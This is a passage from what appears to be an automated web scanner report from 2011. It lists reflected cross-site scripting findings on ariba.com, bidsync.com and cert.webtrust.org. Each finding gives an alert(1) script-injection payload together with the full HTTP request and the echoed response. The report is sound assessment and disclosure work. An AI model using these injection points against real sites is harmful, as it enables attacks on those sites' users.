<a href="http://nordics.ariba.com/services/support.cfm?b09fb--><script>alert(1)</script>335291e69b=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.53. http://www.ariba.com/services/support.cfm [x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99102"><script>alert(1)</script>03e1c43be50 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/support.cfm?x=999102"><script>alert(1)</script>03e1c43be50 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=410; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.15.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:31 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=569;expires=Wed, 17-Oct-2012 18:07:31 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
<a href="http://nordics.ariba.com/services/support.cfm?x=999102"><script>alert(1)</script>03e1c43be50&l=dm" title="Denmark">
...[SNIP]...

1.54. http://www.ariba.com/services/support.cfm [x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The value of the x request parameter is copied into an HTML comment. The payload fbf9c--><script>alert(1)</script>18154aa94d5 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/support.cfm?x=9fbf9c--><script>alert(1)</script>18154aa94d5 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=410; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.15.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:36 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=582;expires=Wed, 17-Oct-2012 18:07:36 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
<a href="http://nordics.ariba.com/services/support.cfm?x=9fbf9c--><script>alert(1)</script>18154aa94d5&l=dm" title="D&#228;nemark">
...[SNIP]...

1.55. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /solutions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 227cf"><script>alert(1)</script>374e4619cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions/?227cf"><script>alert(1)</script>374e4619cfe=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=3; s_cc=true; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.2.10.1318960999; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=32; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsolutions%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:44 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=228;expires=Wed, 17-Oct-2012 18:04:44 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Spend Management Software, Spend Management
...[SNIP]...
<a href="http://nordics.ariba.com/solutions/index.cfm?227cf"><script>alert(1)</script>374e4619cfe=1&l=dm" title="Denmark">
...[SNIP]...

1.56. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /solutions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bc027--><script>alert(1)</script>70af1c16482 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions/?bc027--><script>alert(1)</script>70af1c16482=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=3; s_cc=true; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.2.10.1318960999; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=32; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsolutions%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:48 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=252;expires=Wed, 17-Oct-2012 18:04:48 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Spend Management Software, Spend Management
...[SNIP]...
<a href="http://nordics.ariba.com/solutions/index.cfm?bc027--><script>alert(1)</script>70af1c16482=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.57. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /suppliermembership/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae70"><script>alert(1)</script>e1491ffb028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suppliermembership/index.cfm?fae70"><script>alert(1)</script>e1491ffb028=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=80; s_cc=true; s_sq=%5B%5BB%5D%5D; s_ppv=100; gpv_pn=%2Flegal%2Fen_webtrust.cfm; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:56 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=292;expires=Wed, 17-Oct-2012 18:04:56 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/suppliermembership/index.cfm?fae70"><script>alert(1)</script>e1491ffb028=1&l=dm" title="Denmark">
...[SNIP]...

1.58. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /suppliermembership/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b223b--><script>alert(1)</script>4a90bc7dcd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /suppliermembership/index.cfm?b223b--><script>alert(1)</script>4a90bc7dcd3=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=80; s_cc=true; s_sq=%5B%5BB%5D%5D; s_ppv=100; gpv_pn=%2Flegal%2Fen_webtrust.cfm; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:58 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=302;expires=Wed, 17-Oct-2012 18:04:58 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/suppliermembership/index.cfm?b223b--><script>alert(1)</script>4a90bc7dcd3=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.59. https://www.bidsync.com/SupplierRegister [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bidsync.com
Path:   /SupplierRegister

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ca57<img%20src%3da%20onerror%3dalert(1)>2dcc38cf48a was submitted in the REST URL parameter 1. This input was echoed as 2ca57<img src=a onerror=alert(1)>2dcc38cf48a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /2ca57<img%20src%3da%20onerror%3dalert(1)>2dcc38cf48a?ac=register&posting=true&plan=0&regtype=default&cmd=next HTTP/1.1
Host: www.bidsync.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=reuters+supplier#q=supplier+registration&hl=en&tbo=1&prmd=imvns&ei=M6WdTpv5BKjniAK1j5HXCQ&start=10&sa=N&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=67ad93a5206fb0d0&biw=1206&bih=911
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Set-Cookie: LBCOOKIE=R327324337; path=/
Date: Tue, 18 Oct 2011 17:52:35 GMT
Server: Apache
X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1.1 Java/Sun Microsystems Inc./1.6)
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>404 Not Found | B
...[SNIP]...
<b>/2ca57<img src=a onerror=alert(1)>2dcc38cf48a/index.html</b>
...[SNIP]...

1.60. https://www.bidsync.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bidsync.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e93ca<img%20src%3da%20onerror%3dalert(1)>e91ec3331d4 was submitted in the REST URL parameter 1. This input was echoed as e93ca<img src=a onerror=alert(1)>e91ec3331d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /e93ca<img%20src%3da%20onerror%3dalert(1)>e91ec3331d4 HTTP/1.1
Host: www.bidsync.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=829943a1e188a0077f7891b3705a; _bidlync_plan_selection=%7BSYSENC2%7D35kosVC5oG3%2FsIJnEmKe%2BQ%3D%3D44CZvS%2FT7HLGvg%2FDMZFpsnmHCl2z46qsqWL69w%2BlnC9W1dxUujHT5Uj%2BAuJvK9s%2B; LBCOOKIE=R327324337

Response

HTTP/1.1 404 Not Found
Set-Cookie: LBCOOKIE=R327324337; path=/
Date: Tue, 18 Oct 2011 17:52:37 GMT
Server: Apache
X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1.1 Java/Sun Microsystems Inc./1.6)
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>404 Not Found | B
...[SNIP]...
<b>/e93ca<img src=a onerror=alert(1)>e91ec3331d4/index.html</b>
...[SNIP]...

1.61. https://cert.webtrust.org/ViewSeal [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e90de<script>alert(1)</script>0554eaa8499 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ViewSeal?id=781 HTTP/1.1
Host: cert.webtrust.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=e90de<script>alert(1)</script>0554eaa8499
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 16:36:03 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 258

<html>
<head>
<title>Web Trust</title>
<link rel="stylesheet" href="/admin.css" type="text/css">
</head>
<body>
Invalid domain [http://www.google.com/search?hl=en&q=e90de<script>alert(1)</script>0554eaa8499]: please contact your practitioner.</body>
...[SNIP]...

1.62. http://www.ariba.com/contact.cfm [CAMPID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /contact.cfm

Issue detail

The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f219e"><script>alert(1)</script>dfa1c716294 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact.cfm HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/404.cfm?pageLocation=404
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=f219e"><script>alert(1)</script>dfa1c716294; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; ALPersonId=13N33417; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=623; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.21.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=100; gpv_pn=%2F404.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252F404.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fcontact.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:11 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=873;expires=Wed, 17-Oct-2012 18:18:11 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<input type="hidden" name="campaign_id" value="f219e"><script>alert(1)</script>dfa1c716294" />
...[SNIP]...

1.63. http://www.ariba.com/legal/en_webtrust.cfm [CAMPID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa844"><script>alert(1)</script>d6e08f65673 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /legal/en_webtrust.cfm HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; CAMPID=fa844"><script>alert(1)</script>d6e08f65673; WEBSCR=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:02:22 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=48;expires=Wed, 17-Oct-2012 18:02:22 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<input type="hidden" name="campaign_id" value="fa844"><script>alert(1)</script>d6e08f65673" />
...[SNIP]...

1.64. http://www.ariba.com/roles/it.cfm [CAMPID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /roles/it.cfm

Issue detail

The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de3fb"><script>alert(1)</script>290d4d628a6 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /roles/it.cfm HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=de3fb"><script>alert(1)</script>290d4d628a6; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; s_ppv=100; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=125; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Froles%25252Fit.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:13 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
